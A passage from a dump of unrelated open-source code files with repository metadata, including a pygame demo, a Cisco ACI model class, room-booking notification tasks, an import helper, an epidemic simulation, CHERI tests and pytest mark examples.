06fde46f14519931629dcd804ce8b5d896403fd6 | cef574422ec96cc972733812f78b8f777a934326 | /first/drow_circle.py | 976d039d5df39e66cf4054eae764bfd8de493bd7 | [] | no_license | ducksfrogs/pyGame2 | 6aa1f01743fc3bd8df4149f090a5ac63d72686a9 | 17fc545fa66a2d091127cfd4d5779b1e5d3385e4 | refs/heads/main | 2023-02-25T13:42:33.719568 | 2021-01-31T02:49:11 | 2021-01-31T02:49:11 | 323,764,411 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | """Draw circle """
import sys
import pygame
from pygame.locals import QUIT, Rect
pygame.init()
SURFACE = pygame.display.set_mode((400,300))
FPSCLOCK = pygame.time.Clock()
def main():
""" Main routine """
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
SURFACE.fill((255,255,255))
pygame.draw.circle(SURFACE, (255,0,0), (50,50),20)
pygame.draw.circle(SURFACE, (255,0,0), (150,50), 20, 10)
pygame.draw.circle(SURFACE, (0,255,0), (50,150), 10)
pygame.draw.circle(SURFACE, (0,255,0), (150,150), 20)
pygame.display.update()
FPSCLOCK.tick(3)
if __name__ == '__main__':
main()
| [
"ma_yamaki@yahoo.com"
] | ma_yamaki@yahoo.com |
c11bc856f2ea6a25f92cda9810b7bb119e56cd2a | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/syslog/deststate.py | 94dfe225d2349b2697c4c964c150c674e036028f | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 7,070 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class DestState(Mo):
"""
"""
meta = ClassMeta("cobra.model.syslog.DestState")
meta.moClassName = "syslogDestState"
meta.rnFormat = "destst-%(name)s"
meta.category = MoCategory.REGULAR
meta.label = "syslog Destination State"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x800000000000001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Inst")
meta.childClasses.add("cobra.model.fault.Counts")
meta.childClasses.add("cobra.model.health.Inst")
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childClasses.add("cobra.model.syslog.LogMsg")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Counts", "fltCnts"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Inst", "fault-"))
meta.childNamesAndRnPrefix.append(("cobra.model.health.Inst", "health"))
meta.childNamesAndRnPrefix.append(("cobra.model.syslog.LogMsg", "msg-"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.syslog.RemoteDest")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Comp")
meta.rnPrefixes = [
('destst-', True),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5582, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "ip", "ip", 16267, PropCategory.REGULAR)
prop.label = "ip address"
prop.isImplicit = True
prop.isAdmin = True
prop.regex = ['^(?=.{0,255}$)[0-9A-Za-z:\\[\\]](\\[{0,1})(?:(?:[0-9A-Za-z]|-|:){0,61}[0-9A-Za-z])?(?:\\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-|:){0,61}[0-9A-Za-z])?)*\\.?(\\]{0,1})$']
meta.props.add("ip", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "monPolDn", "monPolDn", 16273, PropCategory.REGULAR)
prop.label = "Monitoring policy attached to this observable object"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("monPolDn", prop)
prop = PropMeta("str", "name", "name", 16268, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
prop.range = [(1, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "operState", "operState", 16265, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "unknown"
prop._addConstant("available", "available", 1)
prop._addConstant("errored", "errored", 2)
prop._addConstant("unknown", "unknown", 0)
meta.props.add("operState", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "totalBufferedMsgs", "totalBufferedMsgs", 17622, PropCategory.REGULAR)
prop.label = "total buffered messages"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("totalBufferedMsgs", prop)
prop = PropMeta("str", "totalDroppedMsgs", "totalDroppedMsgs", 17623, PropCategory.REGULAR)
prop.label = "total drooped messages"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("totalDroppedMsgs", prop)
prop = PropMeta("str", "vrfId", "vrfId", 16266, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("vrfId", prop)
meta.namingProps.append(getattr(meta.props, "name"))
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
def __init__(self, parentMoOrDn, name, markDirty=True, **creationProps):
namingVals = [name]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"rrishike@cisco.com"
] | rrishike@cisco.com |
c3b4cb6c2d7cbc8e5894e89e5b6a4b7727329f4d | 80810054516ddc3fd93e916de4bf7e3e07d871b0 | /1-books/book6_Python核心编程(第3版)/网络编程/functools_cmp_to_key.py | d16e6e1763906c6fdd78baf903356b25293a6ea7 | [] | no_license | TinyHandsome/BookStudy | df9ca668f2dd1b51b1e364c22bc531394a03eeae | 69c9018bb70893f74a44e4df9f3d3e39467de3f6 | refs/heads/master | 2023-09-04T03:06:43.918259 | 2023-09-01T04:27:01 | 2023-09-01T04:27:01 | 184,217,837 | 18 | 17 | null | null | null | null | UTF-8 | Python | false | false | 218 | py | x = ['hello', 'world', 'ni']
x.sort(key=len)
print(x)
from functools import cmp_to_key
ll = [9, 2, 23, 1, 2]
print(sorted(ll, key=cmp_to_key(lambda x, y: y - x)))
print(sorted(ll, key=cmp_to_key(lambda x, y: x - y)))
| [
"694317828@qq.com"
] | 694317828@qq.com |
1ec7f1e63501bcd0990480bde271f6da0909fd06 | 20f951bd927e4e5cde8ef7781813fcf0d51cc3ea | /fossir/modules/rb/tasks.py | a602ffdd2659a0af0aad35e4d26284196c247028 | [] | no_license | HodardCodeclub/SoftwareDevelopment | 60a0fbab045cb1802925d4dd5012d5b030c272e0 | 6300f2fae830c0c2c73fe0afd9c684383bce63e5 | refs/heads/master | 2021-01-20T00:30:02.800383 | 2018-04-27T09:28:25 | 2018-04-27T09:28:25 | 101,277,325 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,611 | py |
from __future__ import unicode_literals
from datetime import date, datetime
from itertools import groupby
from operator import attrgetter
from celery.schedules import crontab
from sqlalchemy.orm import contains_eager
from fossir.core.celery import celery
from fossir.core.config import config
from fossir.core.db import db
from fossir.modules.rb import logger, rb_settings
from fossir.modules.rb.models.reservation_occurrences import ReservationOccurrence
from fossir.modules.rb.models.reservations import RepeatFrequency, Reservation
from fossir.modules.rb.models.rooms import Room
from fossir.modules.rb.notifications.reservation_occurrences import notify_upcoming_occurrences
from fossir.util.console import cformat
def _make_occurrence_date_filter():
_default = rb_settings.get('notification_before_days')
_default_weekly = rb_settings.get('notification_before_days_weekly')
_default_monthly = rb_settings.get('notification_before_days_monthly')
notification_before_days_room = db.case({RepeatFrequency.WEEK.value: Room.notification_before_days_weekly,
RepeatFrequency.MONTH.value: Room.notification_before_days_monthly},
else_=Room.notification_before_days, value=Reservation.repeat_frequency)
notification_before_days_default = db.case({RepeatFrequency.WEEK.value: _default_weekly,
RepeatFrequency.MONTH.value: _default_monthly},
else_=_default, value=Reservation.repeat_frequency)
notification_before_days = db.func.coalesce(notification_before_days_room, notification_before_days_default)
days_until_occurrence = db.cast(ReservationOccurrence.start_dt, db.Date) - date.today()
return days_until_occurrence == notification_before_days
def _print_occurrences(user, occurrences, _defaults={}, _overrides={}):
if not _defaults or not _overrides:
_defaults.update({RepeatFrequency.WEEK: rb_settings.get('notification_before_days_weekly'),
RepeatFrequency.MONTH: rb_settings.get('notification_before_days_monthly'),
RepeatFrequency.NEVER: rb_settings.get('notification_before_days'),
RepeatFrequency.DAY: rb_settings.get('notification_before_days')})
_overrides.update({RepeatFrequency.WEEK: lambda r: r.notification_before_days_weekly,
RepeatFrequency.MONTH: lambda r: r.notification_before_days_monthly,
RepeatFrequency.NEVER: lambda r: r.notification_before_days,
RepeatFrequency.DAY: lambda r: r.notification_before_days})
print cformat('%{grey!}*** {} ({}) ***').format(user.full_name, user.email)
for occ in occurrences:
default = _defaults[occ.reservation.repeat_frequency]
override = _overrides[occ.reservation.repeat_frequency](occ.reservation.room)
days = default if override is None else override
days_until = (occ.start_dt.date() - date.today()).days
print cformat(' * %{yellow}{}%{reset} %{green}{:5}%{reset} {} {} {} \t %{blue!}{}%{reset} {} ({})').format(
occ.start_dt.date(), occ.reservation.repeat_frequency.name,
days,
default if override is not None and override != default else ' ',
days_until,
occ.reservation.id,
occ.reservation.room.full_name,
occ.reservation.room.id
)
def _notify_occurrences(user, occurrences):
notify_upcoming_occurrences(user, occurrences)
for occ in occurrences:
occ.notification_sent = True
if occ.reservation.repeat_frequency == RepeatFrequency.DAY:
future_occurrences_query = (occ.reservation.occurrences
.filter(ReservationOccurrence.start_dt >= datetime.now()))
future_occurrences_query.update({'notification_sent': True})
@celery.periodic_task(name='roombooking_occurrences', run_every=crontab(minute='15', hour='8'))
def roombooking_occurrences(debug=False):
if not config.ENABLE_ROOMBOOKING:
logger.info('Notifications not sent because room booking is disabled')
return
if not rb_settings.get('notifications_enabled'):
logger.info('Notifications not sent because they are globally disabled')
return
occurrences = (ReservationOccurrence.query
.join(ReservationOccurrence.reservation)
.join(Reservation.room)
.filter(Room.is_active,
Room.notifications_enabled,
Reservation.is_accepted,
Reservation.booked_for_id.isnot(None),
ReservationOccurrence.is_valid,
ReservationOccurrence.start_dt >= datetime.now(),
~ReservationOccurrence.notification_sent,
_make_occurrence_date_filter())
.order_by(Reservation.booked_for_id, ReservationOccurrence.start_dt, Room.id)
.options(contains_eager('reservation').contains_eager('room'))
.all())
for user, user_occurrences in groupby(occurrences, key=attrgetter('reservation.booked_for_user')):
user_occurrences = list(user_occurrences)
if debug:
_print_occurrences(user, user_occurrences)
else:
_notify_occurrences(user, user_occurrences)
if not debug:
db.session.commit()
| [
"hodardhazwinayo@gmail.com"
] | hodardhazwinayo@gmail.com |
71017d23dc19d08ded41fb88369fda81d0999bc6 | 95565fbf6c2418e3a9e4e43e3982da0220dd6881 | /satella/imports.py | b129afaeeb284639221004d7a9e78a638590461a | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | piotrmaslanka/satella | 6adc649bcbcd3ba596650f9c0bfca15cb0ec3a96 | 8dd3d4741c11717f9473b7fdc4b242dfcade7aa9 | refs/heads/develop | 2023-06-23T03:38:19.810958 | 2023-06-08T16:11:39 | 2023-06-08T16:11:39 | 7,431,872 | 14 | 1 | MIT | 2023-01-07T22:14:14 | 2013-01-03T23:02:52 | Python | UTF-8 | Python | false | false | 4,079 | py | import importlib
import os
import pkgutil
import typing as tp
import warnings
__all__ = ['import_from', 'import_class']
def import_class(path: str) -> type:
"""
Import a class identified with given module path and class name
:param path: path, eg. subprocess.Popen
:return: imported class
"""
*path, classname = path.split('.')
import_path = '.'.join(path)
try:
return getattr(importlib.import_module(import_path), classname)
except AttributeError:
raise ImportError('%s not found in %s' % (classname, import_path))
def import_from(path: tp.List[str], package_prefix: str, all_: tp.List[str],
locals_: tp.Dict[str, tp.Any], recursive: bool = True,
fail_on_attributerror: bool = True, create_all: bool = True,
skip_single_underscores: bool = True,
skip_not_having_all: bool = False) -> None:
"""
Import everything from a given module. Append these module's all to.
This will examine __all__ of given module (if it has any, else it will just import everything
from it, which is probably a bad practice and will heavily pollute the namespace.
As a side effect, this will equip all of your packages with __all__.
:param path: module's __path__
:param package_prefix: package prefix to import from. Use __name__
:param all_: module's __all__ to append to
:param recursive: whether to import packages as well
:param fail_on_attributerror: whether to fail if a module reports something in their __all__
that is physically not there (ie. getattr() raised AttributeError
:param locals_: module's locals, obtain them by calling locals() in importing module's context
:param create_all: whether to create artificial __all__'s for modules that don't have them
:param skip_single_underscores: whether to refrain from importing things that are preceded with
a single underscore. Pertains to modules, as well as items
:param skip_not_having_all: skip module's not having an __all__ entry
:raise AttributeError: module's __all__ contained entry that was not in this module
"""
for importer, modname, is_pkg in pkgutil.walk_packages(path, onerror=lambda x: None):
if recursive and is_pkg:
if modname.startswith('_') and skip_single_underscores:
continue
module = importlib.import_module(package_prefix + '.' + modname)
try:
mod_all = module.__all__
except AttributeError:
if skip_not_having_all:
continue
mod_all = []
if create_all:
module.__all__ = mod_all
import_from([os.path.join(path[0], modname)], package_prefix + '.' + modname, mod_all,
module.__dict__, recursive=recursive,
fail_on_attributerror=fail_on_attributerror, create_all=create_all,
skip_not_having_all=skip_not_having_all,
skip_single_underscores=skip_single_underscores),
locals_[modname] = module
if modname not in all_:
all_.append(modname)
elif not is_pkg:
module = importlib.import_module(package_prefix + '.' + modname)
try:
package_ref = module.__all__
except AttributeError:
warnings.warn('Module %s does not contain __all__, enumerating it instead' %
(package_prefix + '.' + modname,), RuntimeWarning)
package_ref = dir(module)
for item in package_ref:
if item.startswith('_') and skip_single_underscores:
continue
try:
locals_[item] = getattr(module, item)
except AttributeError:
if fail_on_attributerror:
raise
else:
if item not in all_:
all_.append(item)
| [
"piotr.maslanka@henrietta.com.pl"
] | piotr.maslanka@henrietta.com.pl |
9891353f85074b0ed1070e11d7f0e2ad93f4360b | 2903ac66369b6bd45889b12629d8c8e34e6089b3 | /frappe_training/frappe_training/doctype/employee_info/employee_info.py | 6af4951315fdbdbbedc4214387b383397fcc6ffd | [
"MIT"
] | permissive | sivaranjanipalanivel/training | 6fa50b5f97fb00894404fba11122599fd796623c | b177c56a319c07dc3467ce3113e332ecee9b81fa | refs/heads/master | 2023-07-17T06:11:29.894363 | 2021-08-02T14:47:31 | 2021-08-02T14:47:31 | 391,987,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2021, valiantsystems and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class EmployeeINFO(Document):
pass
| [
"you@example.com"
] | you@example.com |
3db5cbd10cb5bc80f423f1f094adf67a4921cb7c | 6b1be23ee65447932c387dc62f556ef8b2097154 | /oblig3/SIRV_optimal_duration.py | 469e098879045c7a4119170062e0db19908c8681 | [] | no_license | Linueks/inf1100 | fd9fb4e0f338d387aa6d06430a5e484cc4037c8d | 0a4a23144fd047bd3b51c44905e6c78754a053a6 | refs/heads/main | 2023-02-20T19:47:21.264189 | 2021-01-23T13:29:02 | 2021-01-23T13:29:02 | 332,216,763 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,769 | py | from SIRV_varying_p import ProblemSIRV, SolverSIRV
import matplotlib.pyplot as plt
def optimal_duration():
maximum_I = []
time_points = range(0, 31, 1)
for time in time_points:
optimal_duration_problem = ProblemSIRV(p = lambda t: 0.1 if 6 <= t <= 6 + time else 0,
beta=0.0005, v=0.1, S0=1500, I0=1, R0=0, V0=0, T=60)
optimal_duration_sim = SolverSIRV(optimal_duration_problem, 0.5)
optimal_duration_sim.solve()
maximum_I.append(optimal_duration_sim.calc_max())
return maximum_I
def plot(values):
vaccination_time = []
maximum_infected = []
for vac_time, max_infected in enumerate(values):
vaccination_time.append(vac_time)
maximum_infected.append(max_infected)
plt.plot(vaccination_time, maximum_infected)
plt.show()
if __name__ == '__main__':
plot(optimal_duration())
print optimal_duration()
"""
The number of infected converges to 441 after 9 days of vaccination, when beta=0.0005
[Linueks@localhost oblig3]$ python SIRV_optimal_duration.py
[877.35589758894105, 764.25790220192289, 669.12776810141145, 591.69267415980698,
532.47707953201677, 490.46684184740479, 462.89122901853545, 447.73309998415226,
441.94995442418212, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926]
"""
| [
"noreply@github.com"
] | Linueks.noreply@github.com |
da568daf9fc7b5f7c51214728a20aade8ee98fae | 7a17f06fc65106e793ad8e23612d32266f14b1dc | /tests/cp2/test_cp2_cjalr_delay_2.py | 8940dcd76c1dc9c9d6d9555a7ba9951f47cf1f4c | [
"LicenseRef-scancode-beri-hw-sw-1.0"
] | permissive | capt-hb/cheritest | 19eda13df15aeba0003e550d97000827090f382a | dacc190eed70261e51a8a438203f680dc52a95c0 | refs/heads/master | 2023-01-19T20:05:40.020021 | 2020-06-11T07:51:26 | 2020-06-11T07:51:26 | 238,688,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,628 | py | #-
# Copyright (c) 2018 Alex Richardson
# All rights reserved.
#
# This software was developed by the University of Cambridge Computer
# Laboratory as part of the Rigorous Engineering of Mainstream Systems (REMS)
# project, funded by EPSRC grant EP/K008528/1.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase, attr
@attr('capabilities')
class test_cp2_cjalr_delay_2(BaseBERITestCase):
def test_cjalr_return_cap_in_delay_slot(self):
'''Test that the new value of $c17 is available in the delay slot'''
self.assertRegisterEqual(self.MIPS.c4.offset, self.MIPS.t0 - 8, "return address offset wrong")
self.assertCapabilitiesEqual(self.MIPS.c4, self.MIPS.c17, "storing $c17 in the delay slot should yield the link address")
def test_cjalr_return_cap_after_delay_slot(self):
self.assertRegisterEqual(self.MIPS.c5.offset, self.MIPS.t0 - 8, "return address offset wrong")
self.assertRegisterEqual(self.MIPS.c17.offset, self.MIPS.t0 - 8, "return address offset wrong")
def test_cjalr_jump_cap_after_delay_slot(self):
self.assertRegisterEqual(self.MIPS.c6.offset, self.MIPS.t0, "jump cap modified by cjalr?")
self.assertRegisterEqual(self.MIPS.c12.offset, self.MIPS.t0, "jump cap modified by cjalr?")
def test_jalr_return_addr_in_delay_slot(self):
'''Test that the new value of $ra is available in the delay slot'''
self.assertRegisterEqual(self.MIPS.a0, self.MIPS.t9 - 8, "return address wrong")
def test_jalr_return_addr_after_delay_slot(self):
self.assertRegisterEqual(self.MIPS.a1, self.MIPS.t9 - 8, "return address wrong")
def test_jalr_jump_addr_after_delay_slot(self):
self.assertRegisterEqual(self.MIPS.a2, self.MIPS.t9, "jump address modified by jalr?")
| [
"Alexander.Richardson@cl.cam.ac.uk"
] | Alexander.Richardson@cl.cam.ac.uk |
a5133468f1e3ac2b8f5cff07596ef2a408f55caf | 90047daeb462598a924d76ddf4288e832e86417c | /third_party/WebKit/Source/build/scripts/make_element_lookup_trie.py | 89b0d36b65ea2270b86f8b56a979d0c65b744131 | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"MIT",
"Apache-2.0"
] | permissive | massbrowser/android | 99b8c21fa4552a13c06bbedd0f9c88dd4a4ad080 | a9c4371682c9443d6e1d66005d4db61a24a9617c | refs/heads/master | 2022-11-04T21:15:50.656802 | 2017-06-08T12:31:39 | 2017-06-08T12:31:39 | 93,747,579 | 2 | 2 | BSD-3-Clause | 2022-10-31T10:34:25 | 2017-06-08T12:36:07 | null | UTF-8 | Python | false | false | 3,206 | py | #!/usr/bin/env python
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import json5_generator
import trie_builder
import template_expander
class ElementLookupTrieWriter(json5_generator.Writer):
    """Emits <namespace>ElementLookupTrie.{h,cpp} from json5 tag-name files."""
    # FIXME: Inherit all these from somewhere.
    default_parameters = {
        'JSInterfaceName': {},
        'constructorNeedsCreatedByParser': {},
        'interfaceName': {},
        'noConstructor': {},
        'runtimeEnabled': {},
    }
    default_metadata = {
        'attrsNullNamespace': None,
        'export': '',
        'fallbackInterfaceName': '',
        'fallbackJSInterfaceName': '',
        'namespace': '',
        'namespacePrefix': '',
        'namespaceURI': '',
    }

    def __init__(self, json5_file_paths):
        super(ElementLookupTrieWriter, self).__init__(json5_file_paths)
        # Map each tag name onto itself; the trie builder only needs keys.
        self._tags = {
            entry['name']: entry['name']
            for entry in self.json5_file.name_dictionaries
        }
        self._namespace = self.json5_file.metadata['namespace'].strip('"')
        base_name = self._namespace + 'ElementLookupTrie'
        self._outputs = {
            base_name + '.h': self.generate_header,
            base_name + '.cpp': self.generate_implementation,
        }

    @template_expander.use_jinja('ElementLookupTrie.h.tmpl')
    def generate_header(self):
        """Template context for the generated header."""
        return {'namespace': self._namespace}

    @template_expander.use_jinja('ElementLookupTrie.cpp.tmpl')
    def generate_implementation(self):
        """Template context for the generated implementation."""
        return {
            'namespace': self._namespace,
            'length_tries': trie_builder.trie_list_by_str_length(self._tags),
        }
if __name__ == '__main__':
    # Entry point: parse CLI arguments and write the trie source files.
    json5_generator.Maker(ElementLookupTrieWriter).main()
| [
"xElvis89x@gmail.com"
] | xElvis89x@gmail.com |
891f93e7f6991eb5a01701d37ad594831e3e606d | 468eacfd3e5e20e15ba4c98a136ff6aca4431a73 | /Labs/oop-1-employees.py | f6e9c036c60148fddabccfd73e0aa4f5cdca2148 | [] | no_license | DREAMS-lab/SES230-Coding-for-Exploration | b9888d837472efa33bc6047faa8ffd1fce00cb43 | f799b6c2fe7f199fed5dc33f2f6e69ca2e06dbc9 | refs/heads/master | 2023-01-07T20:54:04.465586 | 2020-11-11T16:56:01 | 2020-11-11T16:56:01 | 312,028,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 746 | py | class Employee:
"""Fill in the details"""
    def __init__(self, _name='John Doe', _title='nothing', _salary=0):
        """Create an employee; the name is private (name-mangled attribute)."""
        self.__name = _name
        self.title = _title
        self.salary = _salary
def __str__(self):
return self.__name + ' ' + self.title + ' ' + str(self.salary)
    def get_name(self):
        """return the name of the employee"""
        # Accessor is needed because the attribute is name-mangled.
        return self.__name
    def set_salary(self, _salary):
        """Changes the salary of the employee"""
        self.salary = _salary
# Demo: a default-constructed employee, then a small roster printed by name.
employee3 = Employee()
print(employee3)
scrooge_and_marley_employees = [(Employee("Bob Cratchit", 'clerk', 15)), (Employee('Ebenezer', 'founder', 1000))]
for employee in scrooge_and_marley_employees:
    print(employee.get_name())
| [
"jnaneshwar.das@gmail.com"
] | jnaneshwar.das@gmail.com |
13f6a301539f7a1edd24c3d259ad5391980283c4 | 4d40ea521582b88a8373845cd47c94c2fdd3125c | /src/chapter3/test_marks.py | b7eca7c90cb009bd26faa006a0ed26bee72803e4 | [] | no_license | lancelote/pytest-quick-start-guide | a74d01ae322f798e7e1fa4f54ad2432f42d6747f | b76f515b5f4034f195b294e4e13befbad4790d1b | refs/heads/master | 2020-03-29T14:19:17.725110 | 2018-11-07T10:01:31 | 2018-11-07T10:01:31 | 150,010,679 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 638 | py | import pytest
# Marking examples: a plain mark on a test function.
@pytest.mark.slow
def test_long_computation():
    pass
# Marks can carry arguments (consumed by pytest-timeout here).
@pytest.mark.timeout(10, method='thread')
def test_topology_sort():
    pass
# Multiple marks stack on a single test.
@pytest.mark.slow
@pytest.mark.timeout(10, method='thread')
def test_topology_sort_slow():
    pass
# Marks are plain objects, so a configured mark can be stored and reused.
timeout10 = pytest.mark.timeout(10, method='thread')
@timeout10
def test_topology_sort_deco():
    pass
@timeout10
def test_remove_duplicate_point():
    pass
# Marking a class applies the mark to every test method inside it.
@timeout10
class TestCase:
    def test_simple_simulation(self):
        pass
    def test_compute_tracers(self):
        pass
# To apply a mark to a module
pytestmark = [pytest.mark.slow, pytest.mark.timeout(10)]
| [
"lancelote.du.lac@gmail.com"
] | lancelote.du.lac@gmail.com |
120fce3b3efd1034b3432b64e7fb3e599460cce4 | f67986550761cf3ed174d01063f5fdc8a26f59f3 | /vision/modules/YellowBuoy.py | 8f6cbc2d3f99cd730e91568440d78e8e8c8c7b08 | [
"BSD-3-Clause"
